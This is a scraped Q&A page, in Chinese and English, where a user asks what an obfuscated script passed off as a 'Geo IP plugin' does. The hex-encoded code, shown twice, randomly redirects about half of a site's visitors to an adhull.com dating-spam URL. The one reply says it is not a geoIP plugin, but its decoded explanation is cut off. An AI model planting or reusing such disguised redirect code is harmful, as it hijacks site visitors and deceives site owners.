地理 JavaScript 解码
我需要解释此代码如何工作以及如何编辑它以进行更改,它是一个 Geo IP 插件代码。提前致谢
<!--Geo IP plugin (do not remove or page breaks like last time)-->
<script>
var _0x594c=["\x72\x61\x6E\x64\x6F\x6D","\x66\x6C\x6F\x6F\x72","\x61\x64\x68\x75\x6C\x6C\x2E\x63\x6F\x6D", "\x69\x6E\x64\x65\x78\x4F\x66","\x68\x72\x65\x66","\x6C\x6F\x63\x61\x74\x69\x6F\x6E", "\x68\x74\x74\x70\x3A\x2F\x2F\x72\x65\x61\x6C\x6D\x61\x74\x75\x72\x65\x73\x69\x6E\x67\x6C\x65\x73\x34\x30\x2E\x61\x64\x68\x75\x6C\x6C\x2E\x63\x6F\x6D\x2F\x3F\x73\x74\x61\x74\x65\x3D\x57\x61\x73\x68\x69\x6E\x67\x74\x6F\x6E\x26\x61\x67\x65\x3D\x34\x30\x26\x73\x69\x64\x3D\x6E\x6F\x6E\x6C\x6F\x63\x61\x6C"];
var num=Math[_0x594c[1]](Math[_0x594c[0]]()*11);
if(num%2==0){if(window[_0x594c[5]][_0x594c[4]][_0x594c[3]](_0x594c[2])==-1)
{window[_0x594c[5]]=_0x594c[6];} ;} ;
</script>
I need explanation on how this code works and how I can edit it to make changes, It is a Geo IP plugin code. Thanks in advance
<!--Geo IP plugin (do not remove or page breaks like last time)-->
<script>
var _0x594c=["\x72\x61\x6E\x64\x6F\x6D","\x66\x6C\x6F\x6F\x72","\x61\x64\x68\x75\x6C\x6C\x2E\x63\x6F\x6D", "\x69\x6E\x64\x65\x78\x4F\x66","\x68\x72\x65\x66","\x6C\x6F\x63\x61\x74\x69\x6F\x6E", "\x68\x74\x74\x70\x3A\x2F\x2F\x72\x65\x61\x6C\x6D\x61\x74\x75\x72\x65\x73\x69\x6E\x67\x6C\x65\x73\x34\x30\x2E\x61\x64\x68\x75\x6C\x6C\x2E\x63\x6F\x6D\x2F\x3F\x73\x74\x61\x74\x65\x3D\x57\x61\x73\x68\x69\x6E\x67\x74\x6F\x6E\x26\x61\x67\x65\x3D\x34\x30\x26\x73\x69\x64\x3D\x6E\x6F\x6E\x6C\x6F\x63\x61\x6C"];
var num=Math[_0x594c[1]](Math[_0x594c[0]]()*11);
if(num%2==0){if(window[_0x594c[5]][_0x594c[4]][_0x594c[3]](_0x594c[2])==-1)
{window[_0x594c[5]]=_0x594c[6];} ;} ;
</script>
如果你对这篇内容有疑问,欢迎到本站社区发帖提问 参与讨论,获取更多帮助,或者扫码二维码加入 Web 技术交流群。
绑定邮箱获取回复消息
由于您还没有绑定你的真实邮箱,如果其他用户或者作者回复了您的评论,将不能在第一时间通知您!
发布评论
评论(1)
它并不是真正的“geoIP 插件”。
如果您对数组进行解密,它会为您提供:
现在您可以理解该脚本等于
It's not really a "geoIP plugin".
If you decript the array, it gives you:
And you can now understand that the script is equal to